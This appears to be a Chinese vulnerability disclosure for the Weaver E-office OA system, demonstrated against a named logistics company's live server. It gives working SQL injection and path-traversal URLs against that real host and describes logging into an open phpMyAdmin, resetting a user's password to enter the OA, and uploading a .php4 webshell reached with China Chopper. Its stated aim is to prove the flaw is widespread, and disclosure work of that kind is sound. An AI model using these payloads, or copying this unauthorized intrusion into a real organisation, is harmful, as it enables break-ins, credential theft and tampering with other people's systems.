### 简要描述: 验证篇来啦 ### 详细说明: ``` 之前发布的两个漏洞 Coody --- [WooYun: 泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)](http://www.wooyun.org/bugs/wooyun-2013-038914) applychen ---- [WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库](http://www.wooyun.org/bugs/wooyun-2013-034523) cncert国家互联网应急中心 的回应是:对于通用性还需要进一步确认 今天这篇文章证明一下其通用性(存在SQL注入、任意文件下载、文件上传导致任意代码执行)。 ``` ``` 这里需要说明一下: 找到的该案例是通过百度搜索 【泛微oa系统】搜索出来的 ``` [<img src="https://images.seebug.org/upload/201310/1600324378f63a8c0be8b47507b31cc2bd219bb5.jpg" alt="QQ图片20131016003212.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/1600324378f63a8c0be8b47507b31cc2bd219bb5.jpg) ``` 地址是 http://www.sjd-logistics.com:8000/ OA地址 ``` [<img src="https://images.seebug.org/upload/201310/16003028dd98f6e601d83fd2e43abcdd81d58f43.jpg" alt="QQ图片20131016002951.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16003028dd98f6e601d83fd2e43abcdd81d58f43.jpg) ``` 主站是...
### 简要描述: 验证篇来啦 ### 详细说明: ``` 之前发布的两个漏洞 Coody --- [WooYun: 泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)](http://www.wooyun.org/bugs/wooyun-2013-038914) applychen ---- [WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库](http://www.wooyun.org/bugs/wooyun-2013-034523) cncert国家互联网应急中心 的回应是:对于通用性还需要进一步确认 今天这篇文章证明一下其通用性(存在SQL注入、任意文件下载、文件上传导致任意代码执行)。 ``` ``` 这里需要说明一下: 找到的该案例是通过百度搜索 【泛微oa系统】搜索出来的 ``` [<img src="https://images.seebug.org/upload/201310/1600324378f63a8c0be8b47507b31cc2bd219bb5.jpg" alt="QQ图片20131016003212.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/1600324378f63a8c0be8b47507b31cc2bd219bb5.jpg) ``` 地址是 http://www.sjd-logistics.com:8000/ OA地址 ``` [<img src="https://images.seebug.org/upload/201310/16003028dd98f6e601d83fd2e43abcdd81d58f43.jpg" alt="QQ图片20131016002951.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16003028dd98f6e601d83fd2e43abcdd81d58f43.jpg) ``` 主站是 http://www.sjd-logistics.com 上海景鸿国际物流股份有限公司 ``` [<img src="https://images.seebug.org/upload/201310/160029228474b0c3f9f499d3c0bf6a500cb5a8d1.jpg" alt="QQ图片20131016002854.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/160029228474b0c3f9f499d3c0bf6a500cb5a8d1.jpg) ``` 访问OA正常,在地址根目录下发现phpmyadmin,无需认证直接登录 ``` [<img src="https://images.seebug.org/upload/201310/160028272bdc6abf107b635f18db9ab5ead594c1.jpg" alt="QQ图片20131016002758.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/160028272bdc6abf107b635f18db9ab5ead594c1.jpg) ``` 对于本案中躺枪的 【上海景鸿国际物流股份有限公司】望 @cncert国家互联网应急中心 也通知一声吧。 因为数据库可以直接访问,但是用户密码破解不出来,我就从user表中选了一个 【USER_ID为chenglin】的用户,清空其密码直接登录到OA系统中。但测试结束后已经恢复其原有密码。 ``` ### 漏洞证明: ``` 这个部分来证明确实存在:SQL注入,任意文件下载,文件上传导致代码执行等漏洞 ``` ``` 0x01:存在SQL注入 http://www.sjd-logistics.com:8000/general/news/show/read_news.php?NEWS_ID=214 and 1=2 union select 1,user(),database(),4,5,6 ``` [<img src="https://images.seebug.org/upload/201310/16004027a923dbd0786f2872e05723f7818e7443.jpg" alt="QQ图片20131016004000.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16004027a923dbd0786f2872e05723f7818e7443.jpg) ``` ``` ``` 0x02:任意文件下载 http://www.sjd-logistics.com:8000/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 ``` [<img src="https://images.seebug.org/upload/201310/1600435799e202b11734543fb989bc0480451074.jpg" alt="QQ图片20131016004327.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/1600435799e202b11734543fb989bc0480451074.jpg) ``` zend解密后 ``` [<img src="https://images.seebug.org/upload/201310/16005352e4b7be3be3dcb60bbb3c55cb045e994e.jpg" alt="QQ图片20131016005309.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16005352e4b7be3be3dcb60bbb3c55cb045e994e.jpg) ``` ``` ``` 0x03:文件上传导致任意代码执行(上传.php4格式) http://www.sjd-logistics.com:8000/attachment/478596600/conf1g.php4 ``` [<img src="https://images.seebug.org/upload/201310/16004742ffa7bedcffd806327ace14b3c2767443.jpg" alt="QQ图片20131016004709.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16004742ffa7bedcffd806327ace14b3c2767443.jpg) ``` 最后发一张菜刀连接的图片吧 ``` [<img src="https://images.seebug.org/upload/201310/16004920d506ec3ec71938fbf28b48f556513e03.jpg" alt="QQ图片20131016004851.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/16004920d506ec3ec71938fbf28b48f556513e03.jpg) ``` ```